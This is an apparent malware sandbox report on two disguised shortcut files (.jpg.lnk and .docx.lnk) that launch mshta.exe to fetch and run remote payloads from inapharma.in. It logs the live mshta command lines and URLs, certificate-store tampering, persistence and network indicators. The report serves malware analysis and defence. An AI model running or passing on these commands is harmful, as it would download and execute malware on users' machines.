US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp

Files

memory/4372-135-0x0000024D41D70000-0x0000024D42831000-memory.dmp

memory/4372-136-0x0000024D5AF86000-0x0000024D5AF87000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2022-03-22 12:37

Reported

2022-03-22 12:58

Platform

win10v2004-en-20220113

Max time kernel

685s

Max time network

704s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG20210911131002.jpg.lnk

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Windows\System32\mshta.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Windows\System32\mshta.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4300 wrote to memory of 4480 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 4300 wrote to memory of 4480 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG20210911131002.jpg.lnk

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" https://inapharma.in/css/files/photos/Radhika-Images/Image7

C:\Windows\System32\Upfc.exe

C:\Windows\System32\Upfc.exe /launchtype periodic /cv WvBpQzpNj0aEz+tGud/lXQ.0

Network

Country Destination Domain Proto
US 8.8.8.8:53 inapharma.in udp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 8.8.8.8:53 176.122.125.40.in-addr.arpa udp
US 8.8.8.8:53 inapharma.in udp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 8.8.8.8:53 226.101.242.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2022-03-22 12:37

Reported

2022-03-22 12:43

Platform

win10v2004-20220310-en

Max time kernel

302s

Max time network

343s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\Assignment-Covid-19.docx.lnk

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Windows\CurrentVersion\Run C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\dfb847ce-05a4-4b1f-a2c0-b00be02b7510.tmp C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220322133943.pma C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\System32\svchost.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Windows\System32\mshta.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Windows\System32\mshta.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\mshta.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3088 wrote to memory of 1620 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 3088 wrote to memory of 1620 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 1620 wrote to memory of 3856 N/A C:\Windows\System32\mshta.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1620 wrote to memory of 3856 N/A C:\Windows\System32\mshta.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4160 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4160 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1620 wrote to memory of 4184 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe
PID 1620 wrote to memory of 4184 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe
PID 3856 wrote to memory of 4476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 3192 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 3192 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4144 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4144 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4144 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4144 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4144 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4144 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4144 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4144 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4144 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4144 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4144 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4144 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4144 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4144 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\Assignment-Covid-19.docx.lnk

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" https://www.inapharma.in/css/files/docs/Assignment-Covid-19/css

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\Survey-Paper-Covid-19.pdf

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xf8,0x108,0x7ffeb20a46f8,0x7ffeb20a4708,0x7ffeb20a4718

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" https://inapharma.in/css/files/awanda/http/

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2328,10957527560776086265,9873100065652089575,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2580 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2328,10957527560776086265,9873100065652089575,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2776 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2328,10957527560776086265,9873100065652089575,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3060 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2328,10957527560776086265,9873100065652089575,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3712 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2328,10957527560776086265,9873100065652089575,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3716 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2328,10957527560776086265,9873100065652089575,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5212 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2328,10957527560776086265,9873100065652089575,131072 --disable-gpu-compositing --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5216 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --field-trial-handle=2328,10957527560776086265,9873100065652089575,131072 --lang=en-US --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=5408 /prefetch:6

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2328,10957527560776086265,9873100065652089575,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5972 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2328,10957527560776086265,9873100065652089575,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5984 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2328,10957527560776086265,9873100065652089575,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6928 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe

